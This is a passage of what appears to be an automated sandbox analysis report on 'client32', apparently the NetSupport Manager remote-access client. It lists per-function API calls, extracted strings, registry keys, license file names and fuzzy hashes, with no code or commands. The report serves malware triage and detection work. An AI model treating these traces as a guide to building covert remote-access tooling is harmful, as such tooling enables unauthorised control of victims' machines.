                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorModeObject$ExchangeInfoInterlockedNativeStockSystem
                                                                              • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                              • API String ID: 1428277488-3745656997
                                                                              • Opcode ID: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                              • Instruction ID: bbabce5d96ec2c90806d5611ae465d21da0aa0097d7318abfc1e6149708f9681
                                                                              • Opcode Fuzzy Hash: 7ab4675b5621614b5560d1b38db1ee70649d60d135089b240ffcc9cb50bab512
                                                                              • Instruction Fuzzy Hash: 60C137B0E162759EDF02CBF48C847DDFAF4AB8830CF0445BAE855A7285EB715A80C752
                                                                              Function 110310AC Relevance: 28.2, APIs: 8, Strings: 8, Instructions: 249COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • GetStockObject.GDI32(0000000D), ref: 110312E6
                                                                              • GetObjectA.GDI32(00000000,0000003C,?), ref: 110312F6
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 11031334
                                                                              • SetErrorMode.KERNEL32(00000000,?,?,?,?,00000050), ref: 1103133A
                                                                              • InterlockedExchange.KERNEL32(01578D80,00001388), ref: 110313BA
                                                                              • GetACP.KERNEL32(?,?,?,?,?,?,?,00000050), ref: 110313EC
                                                                              • _sprintf.LIBCMT ref: 11031401
                                                                              • _setlocale.LIBCMT ref: 1103140B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorModeObject$ExchangeInterlockedStock_malloc_memset_setlocale_sprintfwsprintf
                                                                              • String ID: .%d$Error %s unloading audiocap dll$j0U$pcicl32$&$*$j$
                                                                              • API String ID: 4242130455-3745656997
                                                                              • Opcode ID: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
                                                                              • Instruction ID: e9c6acc14f93b40a3e0eb8b8fbec85b26532d2932113fe6213d234842048e606
                                                                              • Opcode Fuzzy Hash: 9ce7f7efe95e834453681c4923fbfa899ecbeaf8ae4f254e48ac6de1b4bac228
                                                                              • Instruction Fuzzy Hash: 9891F6B0E06365DEEF02CBF488847ADFFF0AB8830CF1445AAD45597285EB755A40CB52
                                                                              Function 110287A0 Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130librarysynchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000102,NSM.LIC,00000009), ref: 110287F1
                                                                                • Part of subcall function 11081E00: _strrchr.LIBCMT ref: 11081E0E
                                                                              • wsprintfA.USER32 ref: 11028814
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11028859
                                                                              • GetExitCodeProcess.KERNEL32(?,?), ref: 1102886D
                                                                              • wsprintfA.USER32 ref: 11028891
                                                                              • CloseHandle.KERNEL32(?), ref: 110288A7
                                                                              • CloseHandle.KERNEL32(?), ref: 110288B0
                                                                              • LoadLibraryExA.KERNEL32(?,00000000,00000002,?,?,?,?,?,NSM.LIC,00000009), ref: 11028911
                                                                              • GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?,?,?,NSM.LIC,00000009), ref: 11028925
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                              • String ID: "$Locales\%d\$NSM.LIC$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                              • API String ID: 512045693-419896573
                                                                              • Opcode ID: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                              • Instruction ID: fa2db278f690afc2f691dfd055e17c1d40a227d38623a0fdca6da18cc7b7963a
                                                                              • Opcode Fuzzy Hash: 4194357b8a76256af92b6f7944f8688d207fe32debab0c1448cef28b04dbc8d5
                                                                              • Instruction Fuzzy Hash: 4F41B679E40228ABD714CF94DC89FE6B7A8EB45709F0081A5F95497284DAB0AD45CFA0
                                                                              Function 110860E0 Relevance: 26.5, APIs: 8, Strings: 7, Instructions: 218libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(PCIINV.DLL,AB86ACF8,037D6AE0,037D6AD0,?,00000000,1118368C,000000FF,?,11032002,037D6AE0,00000000,?,?,?), ref: 11086115
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 11110280: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,11110F3D,00000000,00000001,?,?,?,?,?,11031700), ref: 1111029E
                                                                              • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 1108613B
                                                                              • GetProcAddress.KERNEL32(00000000,Cancel), ref: 1108614F
                                                                              • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11086163
                                                                              • wsprintfA.USER32 ref: 110861EB
                                                                              • wsprintfA.USER32 ref: 11086202
                                                                              • wsprintfA.USER32 ref: 11086219
                                                                              • CloseHandle.KERNEL32(00000000,11085F40,00000001,00000000), ref: 1108636A
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,037D6AE0,00000000,?,?,?), ref: 11085D68
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,037D6AE0,00000000,?,?,?), ref: 11085D7B
                                                                                • Part of subcall function 11085D50: CloseHandle.KERNEL32(?,74DEF550,?,?,11086390,?,11032002,037D6AE0,00000000,?,?,?), ref: 11085D8E
                                                                                • Part of subcall function 11085D50: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11086390,?,11032002,037D6AE0,00000000,?,?,?), ref: 11085DA1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_malloc_memset
                                                                              • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                              • API String ID: 4263811268-2492245516
                                                                              • Opcode ID: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                              • Instruction ID: cc6116ccc6b21cbbfdc815c98c7fdad09c9720580d605ccac26d10648bac74b6
                                                                              • Opcode Fuzzy Hash: 79300dc539d0ee21f2e412ecc2afba85115f3a9800858e180ea8acaac6af75d4
                                                                              • Instruction Fuzzy Hash: 5471CDB4E44709ABEB10CF79DC51BDAFBE8EB48304F00456AF95AD7280EB75A500CB94
                                                                              Function 11030B78 Relevance: 26.4, APIs: 8, Strings: 7, Instructions: 190synchronizationlibraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenMutexA.KERNEL32(001F0001,00000000,PCIMutex), ref: 11030CB3
                                                                              • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex), ref: 11030CCA
                                                                              • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030D6C
                                                                              • SetLastError.KERNEL32(00000078), ref: 11030D82
                                                                              • WaitForSingleObject.KERNEL32(?,000001F4), ref: 11030DBC
                                                                              • CloseHandle.KERNEL32(?), ref: 11030DC9
                                                                              • FreeLibrary.KERNEL32(?), ref: 11030DD4
                                                                              • CloseHandle.KERNEL32(00000000), ref: 11030DDB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                              • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                              • API String ID: 2061479752-1320826866
                                                                              • Opcode ID: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                              • Instruction ID: 041cc1499d836288ec3ce923e3d2bdfde1aeba2e10a7f52041b4b34688633552
                                                                              • Opcode Fuzzy Hash: 31d4d7e0d446ccaa05157b9b8574c54ec02251f8c6dcbf221a4ba88b6680946e
                                                                              • Instruction Fuzzy Hash: 64610974E1631A9FEB15DBB08D89B9DF7B4AF4070DF0040A8E915A72C5EF74AA40CB51
                                                                              Function 11106E70 Relevance: 24.7, APIs: 9, Strings: 5, Instructions: 153COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetTickCount.KERNEL32 ref: 11106E9E
                                                                              • EnterCriticalSection.KERNEL32(111F160C), ref: 11106EA7
                                                                              • GetTickCount.KERNEL32 ref: 11106EAD
                                                                              • GetTickCount.KERNEL32 ref: 11106F00
                                                                              • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F09
                                                                              • GetTickCount.KERNEL32 ref: 11106F3A
                                                                              • LeaveCriticalSection.KERNEL32(111F160C), ref: 11106F43
                                                                              • EnterCriticalSection.KERNEL32(111F160C), ref: 11106F6C
                                                                              • LeaveCriticalSection.KERNEL32(111F160C,00000000,?,00000000), ref: 11107033
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                                • Part of subcall function 110F1080: InitializeCriticalSection.KERNEL32(00000038,00000000,00000000,?,00000000,?,11106FD7,?), ref: 110F10AB
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$CountTick$Leave$Enter$Initialize_malloc_memsetwsprintf
                                                                              • String ID: Warning. simap lock held for %d ms$Warning. took %d ms to get simap lock$e:\nsmsrc\nsm\1210\1210f\client32\platnt.cpp$info. new psi(%d) = %x$psi
                                                                              • API String ID: 1574099134-3013461081
                                                                              • Opcode ID: df4902ffb87e1d2cb2b27f82f6ea2afa4ed876c6644a62c430f637ec615cd2dd
                                                                              • Instruction ID: b37b6005da44a37f7a6c975450b0fd24ca11ef460d9c524a884b745d5c10ab20
                                                                              • Opcode Fuzzy Hash: df4902ffb87e1d2cb2b27f82f6ea2afa4ed876c6644a62c430f637ec615cd2dd
                                                                              • Instruction Fuzzy Hash: 5B414D7AF0022AABD700DFE59D91FDEFBB8EB46218F50053AF409E7240EA30690487D1
                                                                              Function 1102D360 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 289servicesleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F,?,00000000,19141918,1102E368,00000000,AB86ACF8,?,00000000,00000000), ref: 1102D594
                                                                              • OpenServiceA.ADVAPI32(00000000,ProtectedStorage,00000004), ref: 1102D5AA
                                                                              • QueryServiceStatus.ADVAPI32(00000000,?), ref: 1102D5BE
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5C5
                                                                              • Sleep.KERNEL32(00000032), ref: 1102D5D6
                                                                              • CloseServiceHandle.ADVAPI32(00000000), ref: 1102D5E6
                                                                              • Sleep.KERNEL32(000003E8), ref: 1102D632
                                                                              • CloseHandle.KERNEL32(?), ref: 1102D65F
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Service$CloseHandle$OpenSleep$ManagerQueryStatus
                                                                              • String ID: >$IKS.LIC$NSA.LIC$NSM.LIC$ProtectedStorage
                                                                              • API String ID: 83693535-1096744297
                                                                              • Opcode ID: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                              • Instruction ID: 28ce5055a28a8f5180363266ffebbc24acbf765ee5ceddae65e6c679609cb99b
                                                                              • Opcode Fuzzy Hash: 16638ad64ad6c87bf80ad98c247ef6ea51b2bd2907fd9caef6a18a875ee6ead4
                                                                              • Instruction Fuzzy Hash: 3DB18F75E012259BEB25CF64CC84BEDB7B5BB49708F5041E9E919AB380DB70AE80CF50
                                                                              Function 1102CB60 Relevance: 23.0, APIs: 5, Strings: 8, Instructions: 238synchronizationCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 111100D0: SetEvent.KERNEL32(00000000,?,1102CB9F), ref: 111100F4
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CBA5
                                                                              • GetTickCount.KERNEL32 ref: 1102CBCA
                                                                                • Part of subcall function 110D0960: __strdup.LIBCMT ref: 110D097A
                                                                              • GetTickCount.KERNEL32 ref: 1102CCC4
                                                                                • Part of subcall function 110D15C0: wvsprintfA.USER32(?,?,1102CC61), ref: 110D15EB
                                                                                • Part of subcall function 110D0A10: _free.LIBCMT ref: 110D0A3D
                                                                              • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102CDBC
                                                                              • CloseHandle.KERNEL32(?), ref: 1102CDD8
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                              • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                              • API String ID: 596640303-1725438197
                                                                              • Opcode ID: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                              • Instruction ID: dd5538bcf42f02d8fc6af97e821dff418cbfa7b7de554536dce4014f8caac367
                                                                              • Opcode Fuzzy Hash: 4b4be5afc825d4046c7b89c8e65dc4458f3d4dc60d274e6f777fc83c6e95621d
                                                                              • Instruction Fuzzy Hash: 62817E34E0021A9BDF04DBE4CD90FEEF7B5AF55348F508259E82667284DB74BA05CBA1
                                                                              Function 11062220 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 135registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,00000000,?,?), ref: 1106227A
                                                                                • Part of subcall function 11061C60: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 11061C9C
                                                                                • Part of subcall function 11061C60: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11061CF4
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 110622CB
                                                                              • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11062385
                                                                              • RegCloseKey.ADVAPI32(?), ref: 110623A1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000003.00000002.2970508337.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000003.00000002.2970485594.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970634532.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970685267.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970711939.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000003.00000002.2970736603.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_3_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Enum$Open$CloseValue
                                                                              • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                              • API String ID: 2823542970-1528906934
                                                                              • Opcode ID: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                              • Instruction ID: 91282df486796d8d45fa06834b6704f4eef725291cd5fd64ae30f86ab301b8e1
                                                                              • Opcode Fuzzy Hash: 9e66086bdcfe763fdfca1dd6d11cb513a07c5b652eaae9028f71572ee86393c5
                                                                              • Instruction Fuzzy Hash: F6415E79A0022D6BD724CF51DC81FEAB7BCEF58748F1041D9EA49A6140DBB06E85CFA1
                                                                              Function 11138580 Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 130COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 1105E820: __wcstoi64.LIBCMT ref: 1105E85D
                                                                              • GetTickCount.KERNEL32 ref: 111385E2
                                                                                • Part of subcall function 11096D90: CoInitialize.OLE32(00000000), ref: 11096DA4
